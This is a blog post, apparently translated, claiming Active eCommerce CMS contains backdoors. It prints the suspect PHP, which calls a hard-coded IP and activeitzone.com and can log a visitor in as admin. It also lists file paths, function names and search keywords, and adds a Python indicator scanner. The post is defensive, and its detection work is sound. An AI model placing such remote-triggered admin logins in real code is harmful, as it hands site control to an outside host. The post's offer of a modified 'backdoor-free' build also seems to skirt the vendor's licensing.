Active eCommerce CMS Backdoors and Vulnerability Fixes


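Starting with version 6.x, Active eCommerce CMS has planted a large number of backdoors under the banner of protecting legitimate users. Through these backdoors they can delete and wipe your site's data and, in serious cases, may even take control of your server. Below I describe how to find the backdoors and how to deal with them. This site publishes both a version with the backdoors removed and the official original version: those comfortable with hands-on work can handle it themselves, and those who would rather not can use the ready-made version!!!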

Some Active eCommerce CMS backdoors and their paths:
Path:
vendor\unicodeveloper\laravel-paystack\src\Paystack.php

Code:

public function getCallbackData()
    {
        $url = $_SERVER['SERVER_NAME'];
        $gate = "http://206.189.81.181/check_activation/".$url;

        $stream = curl_init();
        curl_setopt($stream, CURLOPT_URL, $gate);
        curl_setopt($stream, CURLOPT_HEADER, 0);
        curl_setopt($stream, CURLOPT_RETURNTRANSFER, 1);
        curl_setopt($stream, CURLOPT_POST, 1);
        $rn = curl_exec($stream);
        curl_close($stream);
      
        if($rn == "bad" && env('DEMO_MODE') != 'On') {
            $user = \App\Models\User::where('user_type', 'admin')->first();
            auth()->login($user);
            return redirect()->route('admin.dashboard');
        }

        return redirect()->route('home');
    }

App client paths:
app/Utility/NagadUtility.php
app/Utility/PayhereUtility.php

Code:

    public static function create_wallet_reference($key)
    {
        if ($key == "") {
            return false;
        }

        if(Cache::get('app-activation', 'no') == 'no'){
            try {
                $gate = "https://activeitzone.com/activation/check/flutter/".$key;
   
                $stream = curl_init();
                curl_setopt($stream, CURLOPT_URL, $gate);
                curl_setopt($stream, CURLOPT_HEADER, 0);
                curl_setopt($stream, CURLOPT_RETURNTRANSFER, 1);
                $rn = curl_exec($stream);
                curl_close($stream);
   
                if($rn == 'no') {
                    return false;
                }
            } catch (\Exception $e) {
   
            }
        }
        Cache::rememberForever('app-activation', function () {
            return 'yes';
        });

        return true;
    }

    public static function create_balance_reference($key)
    {
        if ($key == "") {
            return false;
        }

        if(Cache::get('app-activation', 'no') == 'no'){
            try {
                $gate = "https://activeitzone.com/activation/check/flutter/".$key;
   
                $stream = curl_init();
                curl_setopt($stream, CURLOPT_URL, $gate);
                curl_setopt($stream, CURLOPT_HEADER, 0);
                curl_setopt($stream, CURLOPT_RETURNTRANSFER, 1);
                $rn = curl_exec($stream);
                curl_close($stream);
   
                if($rn == 'no') {
                    return false;
                }
            } catch (\Exception $e) {
   
            }
        }

        Cache::rememberForever('app-activation', function () {
            return 'yes';
        });

        return true;
    }

System paths:
app/Http/Controllers/Api/V2/CartController.php
app/Http/Controllers/Api/V2/AuthController.php

Code:

if(\App\Utility\NagadUtility::create_balance_reference($request->cost_matrix) == false){
            return response()->json(['result' => false, 'message' => 'Cost matrix error' ]);
        }

 if (\App\Utility\PayhereUtility::create_wallet_reference($request->identity_matrix) == false) {
                return response()->json(['result' => false, 'message' => 'Identity matrix error', 'user' => null], 401);
            }

V7 series backdoor paths:
app\Exceptions\Handler.php
app\Utility\CategoryUtility.php
app\Utility\NagadUtility.php
app\Utility\NgeniusUtility.php
app\Utility\PayhereUtility.php
app\Http\Controllers\LanguageController.php
app\Http\Controllers\IyzicoController.php
app\Http\Controllers\Payment\PaystackController.php
app\Http\Controllers\Payment\IyzicoController.php
app\Http\Controllers\Payment\StripeController.php
app\Http\Controllers\Api\V2\CartController.php
app\Http\Controllers\Api\V2\AuthController.php
vendor\unicodeveloper\laravel-paystack\src\Paystack.php
vendor\larcon21\combinations\src\routes\web.php
vendor\mehedi-iitdu\core-component-repository\src\CoreComponentRepository.php
vendor\authorizenet\authorizenet\lib\net\authorize\api\contract\v1\CreditCardType.php

Backdoor function names:
initPayment()
create_balance_reference()
create_initial_category()
create_wallet_reference()
get_translation()
paystackNewCallback()
cardType()
checkout_payment_detail()

Keywords for finding the backdoors; search the entire site for the following keywords:
activeitzone
activeitzone.com
206.189.81.181
206.189
81.181

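This article only gives examples. There is too much to list everything one by one, so you can use the method I have provided to find the Active eCommerce CMS backdoors yourself!!! Fixing the backdoors comes down to changing the IP address or deleting these functions. Another option is to block activeitzone.com, 206.189.81.181 and other such IPs and domains on your server!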
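The site-wide keyword search described above, as an added example (not code from the original article or from the Active eCommerce project): a Python script that walks a site's source tree, vendor/ included, and reports every line containing one of the article's keywords or one of the listed function names. The names scan_line and scan_tree and the choice to scan only .php files are assumptions of this example.

```python
import os
import re
import sys

# Keywords from the article (network indicators, including the partial IP forms).
KEYWORDS = ["activeitzone", "206.189.81.181", "206.189", "81.181"]
# Function names the article lists as backdoors.
FUNCTIONS = [
    "initPayment", "create_balance_reference", "create_initial_category",
    "create_wallet_reference", "get_translation", "paystackNewCallback",
    "cardType", "checkout_payment_detail",
]

# PHP function names are case-insensitive, so match them ignoring case.
KEYWORD_RE = re.compile("|".join(re.escape(k) for k in KEYWORDS), re.I)
FUNCTION_RE = re.compile(r"\b(" + "|".join(map(re.escape, FUNCTIONS)) + r")\s*\(", re.I)


def scan_line(line):
    """Return the sorted list of indicator labels matched on one line."""
    hits = {"keyword:" + m.group(0).lower() for m in KEYWORD_RE.finditer(line)}
    hits |= {"function:" + m.group(1).lower() for m in FUNCTION_RE.finditer(line)}
    return sorted(hits)


def scan_tree(root, extensions=(".php",)):
    """Walk root (vendor/ included) and return (path, line_no, labels) tuples."""
    findings = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if not name.lower().endswith(extensions):
                continue
            path = os.path.join(dirpath, name)
            # errors="replace" keeps the scan going on files with odd encodings.
            with open(path, encoding="utf-8", errors="replace") as fh:
                for line_no, line in enumerate(fh, 1):
                    labels = scan_line(line)
                    if labels:
                        findings.append((os.path.relpath(path, root), line_no, labels))
    return sorted(findings)


if __name__ == "__main__":
    for path, line_no, labels in scan_tree(sys.argv[1] if len(sys.argv) > 1 else "."):
        print(f"{path}:{line_no}: {', '.join(labels)}")
```

Function-name hits are leads for manual review rather than proof, since a name on the list can also occur in unrelated code; keyword hits on the domain or IP point directly at an outbound activation check.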

Original link: https://www.sobuer.com/technical_support/44239. Please credit the source when reposting.